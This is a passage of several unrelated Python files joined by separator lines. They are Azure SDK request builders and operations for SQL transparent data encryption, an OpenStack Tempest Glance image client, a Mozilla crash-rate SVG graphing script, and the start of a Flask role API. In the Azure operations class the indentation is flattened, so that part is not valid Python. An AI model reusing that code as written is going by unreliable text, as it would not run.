    accept = "application/json"

    # Fill the path template with serialized, URL-safe arguments.
    template = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/transparentDataEncryption/{tdeName}')
    url = _format_url_section(template, **{
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        "managedInstanceName": _SERIALIZER.url("managed_instance_name", managed_instance_name, 'str'),
        "databaseName": _SERIALIZER.url("database_name", database_name, 'str'),
        "tdeName": _SERIALIZER.url("tde_name", tde_name, 'str'),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
    })

    # Query string and headers; Content-Type is only sent when a body
    # content type was supplied by the caller.
    query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
    header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
    if content_type is not None:
        header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="PUT",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        json=json,
        content=content,
        **kwargs
    )
def build_list_by_database_request(
    resource_group_name: str,
    managed_instance_name: str,
    database_name: str,
    subscription_id: str,
    **kwargs: Any
) -> HttpRequest:
    """Build an HTTP GET request that lists a managed database's
    transparent data encryption configurations."""
    api_version = "2020-11-01-preview"
    accept = "application/json"

    # Fill the path template with serialized, URL-safe arguments.
    template = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/transparentDataEncryption')
    url = _format_url_section(template, **{
        "resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
        "managedInstanceName": _SERIALIZER.url("managed_instance_name", managed_instance_name, 'str'),
        "databaseName": _SERIALIZER.url("database_name", database_name, 'str'),
        "subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
    })

    # Query string and headers; caller-supplied values are preserved.
    query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
    header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        **kwargs
    )
class ManagedDatabaseTransparentDataEncryptionOperations(object):
"""ManagedDatabaseTransparentDataEncryptionOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.sql.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
    # Pipeline client used to send HTTP requests.
    self._client = client
    # msrest serializer/deserializer pair for request and response models.
    self._serialize = serializer
    self._deserialize = deserializer
    # Service client configuration (holds subscription_id, credentials, etc.).
    self._config = config
@distributed_trace
def get(
self,
resource_group_name: str,
managed_instance_name: str,
database_name: str,
tde_name: Union[str, "_models.TransparentDataEncryptionName"],
**kwargs: Any
) -> "_models.ManagedTransparentDataEncryption":
"""Gets a managed database's transparent data encryption.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param managed_instance_name: The name of the managed instance.
:type managed_instance_name: str
:param database_name: The name of the managed database for which the transparent data
encryption is defined.
:type database_name: str
:param tde_name: The name of the transparent data encryption configuration.
:type tde_name: str or ~azure.mgmt.sql.models.TransparentDataEncryptionName
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ManagedTransparentDataEncryption, or the result of cls(response)
:rtype: ~azure.mgmt.sql.models.ManagedTransparentDataEncryption
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedTransparentDataEncryption"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
managed_instance_name=managed_instance_name,
database_name=database_name,
tde_name=tde_name,
subscription_id=self._config.subscription_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ManagedTransparentDataEncryption', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/transparentDataEncryption/{tdeName}'} # type: ignore
@distributed_trace
def create_or_update(
self,
resource_group_name: str,
managed_instance_name: str,
database_name: str,
tde_name: Union[str, "_models.TransparentDataEncryptionName"],
parameters: "_models.ManagedTransparentDataEncryption",
**kwargs: Any
) -> "_models.ManagedTransparentDataEncryption":
"""Updates a database's transparent data encryption configuration.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param managed_instance_name: The name of the managed instance.
:type managed_instance_name: str
:param database_name: The name of the managed database for which the security alert policy is
defined.
:type database_name: str
:param tde_name: The name of the transparent data encryption configuration.
:type tde_name: str or ~azure.mgmt.sql.models.TransparentDataEncryptionName
:param parameters: The database transparent data encryption.
:type parameters: ~azure.mgmt.sql.models.ManagedTransparentDataEncryption
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ManagedTransparentDataEncryption, or the result of cls(response)
:rtype: ~azure.mgmt.sql.models.ManagedTransparentDataEncryption
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedTransparentDataEncryption"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'ManagedTransparentDataEncryption')
request = build_create_or_update_request(
resource_group_name=resource_group_name,
managed_instance_name=managed_instance_name,
database_name=database_name,
tde_name=tde_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.create_or_update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ManagedTransparentDataEncryption', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ManagedTransparentDataEncryption', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/transparentDataEncryption/{tdeName}'} # type: ignore
@distributed_trace
def list_by_database(
self,
resource_group_name: str,
managed_instance_name: str,
database_name: str,
**kwargs: Any
) -> Iterable["_models.ManagedTransparentDataEncryptionListResult"]:
"""Gets a list of managed database's transparent data encryptions.
:param resource_group_name: The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
:type resource_group_name: str
:param managed_instance_name: The name of the managed instance.
:type managed_instance_name: str
:param database_name: The name of the managed database for which the transparent data
encryption is defined.
:type database_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ManagedTransparentDataEncryptionListResult or the
result of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.sql.models.ManagedTransparentDataEncryptionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedTransparentDataEncryptionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_database_request(
resource_group_name=resource_group_name,
managed_instance_name=managed_instance_name,
database_name=database_name,
subscription_id=self._config.subscription_id,
template_url=self.list_by_database.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_database_request(
resource_group_name=resource_group_name,
managed_instance_name=managed_instance_name,
database_name=database_name,
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ManagedTransparentDataEncryptionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/managedInstances/{managedInstanceName}/databases/{databaseName}/transparentDataEncryption'} # type: ignore
|
|
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import errno
import os
import time
from oslo_log import log as logging
from oslo_serialization import jsonutils as json
import six
from six.moves.urllib import parse as urllib
from tempest.common import glance_http
from tempest import exceptions
from tempest.lib.common import rest_client
from tempest.lib.common.utils import misc as misc_utils
from tempest.lib import exceptions as lib_exc
LOG = logging.getLogger(__name__)
class ImagesClient(rest_client.RestClient):
    """Tempest client for the Glance image API (v1).

    Wraps rest_client.RestClient, translating between the v1 API's
    header-encoded image metadata and plain dicts, and streaming raw
    image data through a dedicated glance_http.HTTPClient.
    """

    def __init__(self, auth_provider, catalog_type, region, **kwargs):
        super(ImagesClient, self).__init__(
            auth_provider, catalog_type, region, **kwargs)
        # Raw-data HTTP client is created lazily; see the `http` property.
        self._http = None
        self.dscv = kwargs.get("disable_ssl_certificate_validation")
        self.ca_certs = kwargs.get("ca_certs")

    def _image_meta_from_headers(self, headers):
        """Decode x-image-meta-* response headers into a metadata dict."""
        meta = {'properties': {}}
        for key, value in six.iteritems(headers):
            if key.startswith('x-image-meta-property-'):
                _key = key[len('x-image-meta-property-'):]
                meta['properties'][_key] = value
            elif key.startswith('x-image-meta-'):
                _key = key[len('x-image-meta-'):]
                meta[_key] = value
        # Boolean flags arrive as free-form strings; normalize them.
        for key in ['is_public', 'protected', 'deleted']:
            if key in meta:
                meta[key] = meta[key].strip().lower() in ('t', 'true', 'yes',
                                                          '1')
        # Numeric fields: keep the raw string when it doesn't parse.
        for key in ['size', 'min_ram', 'min_disk']:
            if key in meta:
                try:
                    meta[key] = int(meta[key])
                except ValueError:
                    pass
        return meta

    def _image_meta_to_headers(self, fields):
        """Encode a metadata dict into x-image-meta-* request headers."""
        headers = {}
        fields_copy = copy.deepcopy(fields)
        copy_from = fields_copy.pop('copy_from', None)
        if copy_from is not None:
            headers['x-glance-api-copy-from'] = copy_from
        for key, value in six.iteritems(fields_copy.pop('properties', {})):
            headers['x-image-meta-property-%s' % key] = str(value)
        for key, value in six.iteritems(fields_copy.pop('api', {})):
            headers['x-glance-api-property-%s' % key] = str(value)
        for key, value in six.iteritems(fields_copy):
            headers['x-image-meta-%s' % key] = str(value)
        return headers

    def _get_file_size(self, obj):
        """Analyze file-like object and attempt to determine its size.

        :param obj: file-like object, typically redirected from stdin.
        :retval The file's size or None if it cannot be determined.
        """
        # For large images, we need to supply the size of the
        # image file. See LP Bugs #827660 and #845788.
        if hasattr(obj, 'seek') and hasattr(obj, 'tell'):
            try:
                obj.seek(0, os.SEEK_END)
                obj_size = obj.tell()
                obj.seek(0)
                return obj_size
            except IOError as e:
                if e.errno == errno.ESPIPE:
                    # Illegal seek. This means the user is trying
                    # to pipe image data to the client, e.g.
                    # echo testdata | bin/glance add blah..., or
                    # that stdin is empty, or that a file-like
                    # object which doesn't support 'seek/tell' has
                    # been supplied.
                    return None
                else:
                    raise
        else:
            # Cannot determine size of input image
            return None

    def _get_http(self):
        """Build the raw-data HTTP client used for image upload/download."""
        return glance_http.HTTPClient(auth_provider=self.auth_provider,
                                      filters=self.filters,
                                      insecure=self.dscv,
                                      ca_certs=self.ca_certs)

    def _create_with_data(self, headers, data):
        """POST a new image together with its raw data payload."""
        resp, body_iter = self.http.raw_request('POST', '/v1/images',
                                                headers=headers, body=data)
        self._error_checker('POST', '/v1/images', headers, data, resp,
                            body_iter)
        body = json.loads(''.join([c for c in body_iter]))
        return rest_client.ResponseBody(resp, body)

    def _update_with_data(self, image_id, headers, data):
        """PUT updated raw data (and metadata headers) for an image."""
        url = '/v1/images/%s' % image_id
        resp, body_iter = self.http.raw_request('PUT', url, headers=headers,
                                                body=data)
        self._error_checker('PUT', url, headers, data,
                            resp, body_iter)
        body = json.loads(''.join([c for c in body_iter]))
        return rest_client.ResponseBody(resp, body)

    @property
    def http(self):
        """Lazily-built glance_http client for raw image data transfers."""
        if self._http is None:
            self._http = self._get_http()
        return self._http

    def create_image(self, **kwargs):
        """Create an image; 'data' kwarg (if any) is uploaded as the body."""
        headers = {}
        data = kwargs.pop('data', None)
        headers.update(self._image_meta_to_headers(kwargs))
        if data is not None:
            return self._create_with_data(headers, data)
        resp, body = self.post('v1/images', None, headers)
        self.expected_success(201, resp.status)
        body = json.loads(body)
        return rest_client.ResponseBody(resp, body)

    def update_image(self, image_id, **kwargs):
        """Update an image; 'data' kwarg (if any) replaces the image body."""
        headers = {}
        data = kwargs.pop('data', None)
        headers.update(self._image_meta_to_headers(kwargs))
        if data is not None:
            return self._update_with_data(image_id, headers, data)
        url = 'v1/images/%s' % image_id
        resp, body = self.put(url, None, headers)
        self.expected_success(200, resp.status)
        body = json.loads(body)
        return rest_client.ResponseBody(resp, body)

    def delete_image(self, image_id):
        """Delete the given image."""
        url = 'v1/images/%s' % image_id
        resp, body = self.delete(url)
        self.expected_success(200, resp.status)
        return rest_client.ResponseBody(resp, body)

    def list_images(self, detail=False, **kwargs):
        """Return a list of all images filtered by input parameters.

        Available params: see http://developer.openstack.org/
                              api-ref-image-v1.html#listImage-v1

        Most parameters except the following are passed to the API without
        any changes.
        :param changes_since: The name is changed to changes-since
        """
        url = 'v1/images'
        if detail:
            url += '/detail'
        # 'properties' dict entries become individual property-<name> filters.
        properties = kwargs.pop('properties', {})
        for key, value in six.iteritems(properties):
            kwargs['property-%s' % key] = value
        if kwargs.get('changes_since'):
            kwargs['changes-since'] = kwargs.pop('changes_since')
        if len(kwargs) > 0:
            url += '?%s' % urllib.urlencode(kwargs)
        resp, body = self.get(url)
        self.expected_success(200, resp.status)
        body = json.loads(body)
        return rest_client.ResponseBody(resp, body)

    def get_image_meta(self, image_id):
        """Fetch image metadata via HEAD (metadata lives in the headers)."""
        url = 'v1/images/%s' % image_id
        resp, __ = self.head(url)
        self.expected_success(200, resp.status)
        body = self._image_meta_from_headers(resp)
        return rest_client.ResponseBody(resp, body)

    def show_image(self, image_id):
        """Download the raw image data."""
        url = 'v1/images/%s' % image_id
        resp, body = self.get(url)
        self.expected_success(200, resp.status)
        return rest_client.ResponseBodyData(resp, body)

    def is_resource_deleted(self, id):
        """Return True once the image is gone or marked 'deleted'."""
        try:
            if self.get_image_meta(id)['status'] == 'deleted':
                return True
        except lib_exc.NotFound:
            return True
        return False

    @property
    def resource_type(self):
        """Returns the primary type of resource this client works with."""
        return 'image_meta'

    def list_image_members(self, image_id):
        """List the members the image is shared with."""
        url = 'v1/images/%s/members' % image_id
        resp, body = self.get(url)
        self.expected_success(200, resp.status)
        body = json.loads(body)
        return rest_client.ResponseBody(resp, body)

    def list_shared_images(self, tenant_id):
        """List shared images with the specified tenant"""
        url = 'v1/shared-images/%s' % tenant_id
        resp, body = self.get(url)
        self.expected_success(200, resp.status)
        body = json.loads(body)
        return rest_client.ResponseBody(resp, body)

    def add_member(self, member_id, image_id, **kwargs):
        """Add a member to an image.

        Available params: see http://developer.openstack.org/
                              api-ref-image-v1.html#addMember-v1
        """
        url = 'v1/images/%s/members/%s' % (image_id, member_id)
        body = json.dumps({'member': kwargs})
        resp, __ = self.put(url, body)
        self.expected_success(204, resp.status)
        return rest_client.ResponseBody(resp)

    def delete_member(self, member_id, image_id):
        """Remove a member from an image."""
        url = 'v1/images/%s/members/%s' % (image_id, member_id)
        resp, __ = self.delete(url)
        self.expected_success(204, resp.status)
        return rest_client.ResponseBody(resp)

    # NOTE(afazekas): just for the wait function
    def _get_image_status(self, image_id):
        meta = self.get_image_meta(image_id)
        status = meta['status']
        return status

    # NOTE(afazkas): Wait reinvented again. It is not in the correct layer
    def wait_for_image_status(self, image_id, status):
        """Waits for a Image to reach a given status.

        :raises exceptions.ImageKilledException: if the image reaches
            'killed' before the requested status.
        :raises exceptions.TimeoutException: if build_timeout elapses first.
        """
        start_time = time.time()
        old_value = value = self._get_image_status(image_id)
        while True:
            dtime = time.time() - start_time
            if value != old_value:
                # BUGFIX: a space was missing between the adjacent string
                # literals ('"%s"in'); also log lazily via %-args.
                LOG.info('Value transition from "%s" to "%s" '
                         'in %d second(s).', old_value,
                         value, dtime)
            if value == status:
                return value
            if value == 'killed':
                raise exceptions.ImageKilledException(image_id=image_id,
                                                      status=status)
            if dtime > self.build_timeout:
                # BUGFIX: missing space between '(%ds)' and 'while waiting'.
                message = ('Time Limit Exceeded! (%ds) '
                           'while waiting for %s, '
                           'but we got %s.' %
                           (self.build_timeout, status, value))
                caller = misc_utils.find_test_caller()
                if caller:
                    message = '(%s) %s' % (caller, message)
                raise exceptions.TimeoutException(message)
            # BUGFIX: sleep exactly once per poll; the original slept both
            # before the checks and here, doubling the effective interval.
            time.sleep(self.build_interval)
            old_value = value
            value = self._get_image_status(image_id)
|
|
import os, sys
import csv
import svgwrite
import svggraph
from collections import namedtuple
from datetime import datetime, timedelta
from time import mktime
def float_xrange(start, stop, step):
    """Yield floats from *start* (inclusive) up to *stop* (exclusive).

    Works like range() but accepts float steps.  Values are produced by
    repeated addition, so slight floating-point drift can accumulate over
    very long ranges.

    :param start: first value yielded (if start < stop).
    :param stop: exclusive upper bound.
    :param step: positive increment between successive values.
    :raises ValueError: if step is not positive (would loop forever).
    """
    if step <= 0:
        raise ValueError("step must be positive")
    current = start
    while current < stop:
        yield current
        current += step
# One parsed CSV row: build identifier, active-user count, crash count.
RowType = namedtuple('RowType', ('buildid', 'users', 'crashcount'))

def intconvert(s):
    """Parse *s* as an int, treating the empty string as 0."""
    return 0 if s == '' else int(s)
def buildid_to_datetime(buildid):
    """Convert a YYYYMMDDHHMM... buildid string to a datetime.

    Only the first twelve characters (year, month, day, hour, minute)
    are consulted; any trailing characters are ignored.
    """
    bounds = ((0, 4), (4, 6), (6, 8), (8, 10), (10, 12))
    year, month, day, hour, minute = (int(buildid[i:j]) for i, j in bounds)
    return datetime(year, month, day, hour, minute)
# Overall SVG height, in pixels.
height = 350
# Horizontal pixels allotted per calendar day on the x axis.
width_per_day = 10
# Diameter of each data-point circle, in pixels.
dotSize = 8
def produce_graph(builds, channel, label, fd):
    """Render an interactive SVG crash-rate graph to file object *fd*.

    :param builds: RowType sequence sorted ascending by buildid.
    :param channel: release channel key ('nightly' or 'aurora') selecting
        which branch-date markers are drawn.
    :param label: x-axis label text.
    :param fd: writable file-like object receiving the SVG document.
    """
    # Pad the x range by half a day each side so edge points aren't clipped.
    mindate = buildid_to_datetime(builds[0].buildid) - timedelta(hours=12)
    maxdate = buildid_to_datetime(builds[-1].buildid) + timedelta(hours=12)
    # y axis is crashes per 100 users (ADI); zero-user builds are skipped.
    maxratio = max(float(build.crashcount) / build.users * 100 for build in builds if build.users != 0)
    graph_width = (maxdate - mindate).days * width_per_day
    d = svgwrite.Drawing(id='graphRoot',
                         viewBox='0 0 %s %s' % (graph_width,
                                                height),
                         debug=False)
    d['width'] = str(graph_width)
    d['height'] = str(height)
    # Plot maps (epoch-seconds, ratio) data space onto SVG pixel space.
    plot = svggraph.Plot(d, graph_width, height,
                         mktime(mindate.timetuple()), 0,
                         mktime(maxdate.timetuple()), maxratio)
    plot.config.yaxis.labelRotate = 0
    plot.config.yaxis.labelDepth = 35
    plot.config.xaxis.labelRotate = 90
    plot.config.xaxis.labelDepth = 125
    d.add(plot.root)
    plot.drawAxes()
    plot.printTicks('x', ((mktime(buildid_to_datetime(build.buildid).timetuple()), build.buildid) for build in builds))
    plot.printTicks('y', ((t, str(t)) for t in float_xrange(0, maxratio, .05)))
    plot.printXAxisLabel(label)
    plot.printYAxisLabel("Crashes/100ADI")
    # Branch-uplift dates per channel; each draws a vertical marker line.
    branches = {
        'nightly': [
            (datetime(2013, 8, 5), "Firefox 26.0a1"),
            (datetime(2013, 9, 16), "Firefox 27.0a1"),
            (datetime(2013, 10, 29), "Firefox 28.0a1"),
            (datetime(2013, 12, 10), "Firefox 29.0a1"),
        ],
        'aurora': [
            (datetime(2013, 8, 5), "Firefox 25.0a2"),
            (datetime(2013, 9, 16), "Firefox 26.0a2"),
            (datetime(2013, 10, 29), "Firefox 27.0a2"),
            (datetime(2013, 12, 10), "Firefox 28.0a2"),
        ],
    }
    # NOTE(review): the loop variable shadows the *label* parameter; harmless
    # today because the parameter was already consumed above, but fragile.
    for date, label in branches[channel]:
        x, miny = plot.transform(mktime(date.timetuple()), plot.miny)
        temp, maxy = plot.transform(0, plot.maxy)
        plot.root.add(d.line((x, miny), (x, maxy + plot.fontHeight()), class_='releaseMarker'))
        plot.root.add(d.text(label, (x, maxy + plot.fontHeight()), class_='releaseLabel'))
    # One circle per build; the custom attributes feed the click handler below.
    for build in builds:
        if build.users == 0:
            continue
        x, y = plot.transform(mktime(buildid_to_datetime(build.buildid).timetuple()),
                              float(build.crashcount) / build.users * 100)
        mark = plot.root.add(d.circle((x, y), dotSize / 2, class_="mark"))
        mark['buildid'] = build.buildid
        mark['users'] = build.users
        mark['crashcount'] = build.crashcount
    # Hidden details pop-up (speech-bubble path + three text rows); shown and
    # repositioned by the d3 click handler injected further down.
    detailsWidth = 180
    fontHeight = plot.fontHeight()
    detailsHeight = fontHeight * 5
    g = d.add(d.g(id='details'))
    g.translate(0,0)
    g.add(d.path(('M', 0, 0,
                  'L', 10, 15,
                  'L', 10, detailsHeight,
                  'L', detailsWidth, detailsHeight,
                  'L', detailsWidth, 10,
                  'L', 15, 10,
                  'Z'), id='detailBox')).scale(1)
    g = g.add(d.g(id='detailText'))
    g.translate(12, 2 + fontHeight)
    g.add(d.text('buildid', (0, fontHeight), id='detailsBuildID', class_='detailsText'))
    g.add(d.text('users', (0, fontHeight * 2), id='detailsUsers', class_='detailsText'))
    g.add(d.text('crashcount', (0, fontHeight * 3), id='detailsCrashCount', class_='detailsText'))
    # Embedded stylesheet; %(fontSize)d is filled from the plot config.
    d.add(d.style("""
svg {
  font-family: sans-serif;
}
.border {
  stroke: black;
  stroke-width: 2;
  fill: none;
}
.tick {
  stroke: black;
  stroke-width: 2;
}
.crossTick {
  stroke: #444;
  stroke-width: 1;
}
.tickLabel,
.axisLabel {
  fill: black;
  font-size: %(fontSize)dpt;
}
.axisLabel {
  font-weight: bold;
  text-anchor: middle;
}
.tickLabel {
  dominant-baseline: middle;
}
.tickLabel.xaxis {
  text-anchor: start;
}
.tickLabel.yaxis {
  text-anchor: end;
}
.releaseMarker {
  stroke: #5F5;
  stroke-width: 3;
}
.releaseLabel {
  fill: #060;
  text-anchor: middle;
}
.mark {
  fill: #5D3799;
}
.mark:hover {
  fill: #9b5cff;
}
#detailBox {
  fill: #e3e1af;
  stroke: #919071;
  stroke-width: 1;
}
#details {
  visibility: hidden;
  opacity: 0;
  transition: visibility 0s linear 0.2s,opacity 0.2s ease-in-out;
}
#details.visible {
  visibility: visible;
  opacity: 1;
  transition: opacity 0.2s ease-in-out;
}
#details .detailsText {
  font-size: %(fontSize)dpt;
}
""" % {'fontSize': plot.config.fontSize}))
    d.add(d.script(type='text/javascript',
                   href='https://crash-analysis.mozilla.com/bsmedberg/d3.v3.min.js'))
    # Click handler: shows the details bubble next to the clicked mark,
    # flipping it left/up near the right/bottom edges of the graph.
    d.add(d.script(type='text/javascript',
                   content="""
d3.selectAll('#graphRoot').on('click', function() {
  if (d3.event.target == d3.event.currentTarget) {
    d3.select('#details').classed('visible', false);
    return;
  }
  var mark = d3.select(d3.event.target);
  if (!mark.classed('mark')) {
    return;
  }
  var px = mark.property('cx').baseVal.value;
  var py = mark.property('cy').baseVal.value;
  var d = d3.select('#details');
  d.property('transform').baseVal.getItem(0).setTranslate(px, py);
  d.classed('visible', true);
  d3.select('#detailsBuildID').text(mark.attr('buildid'));
  d3.select('#detailsUsers').text("Users: " + mark.attr('users'));
  d3.select('#detailsCrashCount').text("Crashes: " + mark.attr('crashcount'));
  var scalex, scaley, offsetx, offsety;
  if (px < %(graphWidth)s - %(detailsWidth)s) {
    scalex = 1;
    offsetx = 15;
  }
  else {
    scalex = -1;
    offsetx = -%(detailsWidth)s + 5;
  }
  if (py < %(graphHeight)s - %(detailsHeight)s) {
    scaley = 1;
    offsety = 2 + %(fontHeight)s;
  } else {
    scaley = -1;
    offsety = -%(detailsHeight)s + 2;
  }
  d3.select('#detailBox').property('transform').baseVal.getItem(0).setScale(scalex, scaley);
  d3.select('#detailText').property('transform').baseVal.getItem(0).setTranslate(offsetx, offsety);
});
""" % {'graphWidth': graph_width,
       'graphHeight': height,
       'fontHeight': fontHeight,
       'detailsWidth': detailsWidth,
       'detailsHeight': detailsHeight}))
    d.write(fd)
if __name__ == '__main__':
    # Usage: script.py <csv-file> <channel> <label>; SVG goes to stdout.
    fname, channel, label = sys.argv[1:]
    # BUGFIX: the original opened the CSV without ever closing it; a context
    # manager releases the handle deterministically.
    with open(fname) as csvfile:
        builds = [RowType(buildid, intconvert(users), intconvert(crashcount))
                  for buildid, users, crashcount in csv.reader(csvfile)]
    produce_graph(builds, channel, label, sys.stdout)
|
|
"""Role(s) API"""
from flask import Blueprint, abort, jsonify, request
from ..database import db
from ..extensions import oauth
from ..models.role import Role
from ..models.user import current_user, get_user
from .crossdomain import crossdomain
role_api = Blueprint('role_api', __name__)
@role_api.route('/api/roles')
@crossdomain()
@oauth.require_oauth()
def system_roles():
    """Returns simple JSON defining all system roles
    Returns a list of all known roles. Users belong to one or more
    roles used to control authorization.
    ---
    tags:
      - User
      - Role
    operationId: system_roles
    produces:
      - application/json
    responses:
      200:
        description:
          Returns a list of all known roles. Users belong to one or more
          roles used to control authorization.
        schema:
          id: nested_roles
          properties:
            roles:
              type: array
              items:
                type: object
                required:
                  - name
                properties:
                  name:
                    type: string
                    description:
                      Role name, always a lower case string with no white space.
                  description:
                    type: string
                    description: Plain text describing the role.
                  display_name:
                    type: string
                    description:
                      Display version of name field, title cased with whitespace
      401:
        description:
          if missing valid OAuth token or if the authorized user lacks
          permission to view roles
    security:
      - ServiceToken: []
    """
    # NOTE: the docstring above is parsed as a Swagger/OpenAPI spec by the
    # API-docs generator; edit it with care.
    return jsonify(roles=[r.as_json() for r in Role.query.all()])
@role_api.route('/api/user/<int:user_id>/roles')
@crossdomain()
@oauth.require_oauth()
def roles(user_id):
    """Returns simple JSON defining user roles
    Returns the list of roles the requested user belongs to.
    ---
    tags:
      - User
      - Role
    operationId: getRoles
    parameters:
      - name: user_id
        in: path
        description: TrueNTH user ID
        required: true
        type: integer
        format: int64
    produces:
      - application/json
    responses:
      200:
        description:
          Returns the list of roles the requested user belongs to.
        schema:
          $ref: "#/definitions/nested_roles"
      401:
        description:
          if missing valid OAuth token or if the authorized user lacks
          permission to view requested user_id
    security:
      - ServiceToken: []
    """
    # get_user enforces 'view' permission (404s on unknown user_id); URL
    # authenticated encounters are explicitly permitted for this read.
    user = get_user(
        user_id, 'view', allow_on_url_authenticated_encounters=True)
    return jsonify(roles=[r.as_json() for r in user.roles])
@role_api.route('/api/user/<int:user_id>/roles', methods=('POST',))
@crossdomain()
@oauth.require_oauth()
def add_roles(user_id):
    """Add roles to user, returns simple JSON defining user roles
    Used to add role(s) to a user. See the PUT version for the idempotent
    mechanism to define the complete set of roles for a user. This
    endpoint will only POST a new role (or multiple roles) on a user.
    If any of the roles POSTed are already defined for the user, a 409
    will be raised.
    Only the 'name' field of the roles is referenced. Must match
    current roles in the system.
    Returns a list of all roles associated with user after change.
    ---
    tags:
      - User
      - Role
    operationId: addRoles
    produces:
      - application/json
    parameters:
      - name: user_id
        in: path
        description: TrueNTH user ID
        required: true
        type: integer
        format: int64
      - in: body
        name: body
        schema:
          $ref: "#/definitions/nested_roles"
    responses:
      200:
        description:
          Returns a list of all roles user belongs to after change.
        schema:
          $ref: "#/definitions/nested_roles"
      400:
        description: if the request includes an unknown role.
      401:
        description:
          if missing valid OAuth token or if the authorized user lacks
